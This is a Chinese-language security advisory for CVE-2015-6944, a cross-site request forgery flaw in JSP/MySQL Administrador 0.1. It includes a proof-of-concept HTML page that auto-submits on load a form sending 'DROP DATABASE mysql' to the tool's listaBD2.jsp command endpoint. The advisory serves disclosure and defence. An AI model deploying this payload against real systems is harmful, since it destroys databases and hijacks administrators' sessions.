安全研究
安全漏洞
JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)
发布日期:2015-09-15
更新日期:2015-09-16
受影响系统:JSPMySQL Administrador JSPMySQL Administrador 0.1
描述:
CVE(CAN) ID:
CVE-2015-6944
JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。
JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。
<*来源:hyp3rlinx
链接:
http://www.securityfocus.com/archive/1/archive/1/536406/100/0/threaded
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
hyp3rlinx ()提供了如下测试方法:
<!DOCTYPE>
<html>
<head>
<title>JSP-MYSQL-ADMIN-CSRF</title>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
<!-- CSRF DROP MYSQL DATABASE -->
<form id="HELL" action="
http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
<input type="text" name="cmd" value="DROP DATABASE mysql"/>
<input type="text" name="btncmd" value="Enviar" />
<input type="text" name="bd" value="mysql" />
</form>
建议:
厂商补丁:
JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://sites.google.com/site/mfpledon/producao-de-software浏览次数:3985
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |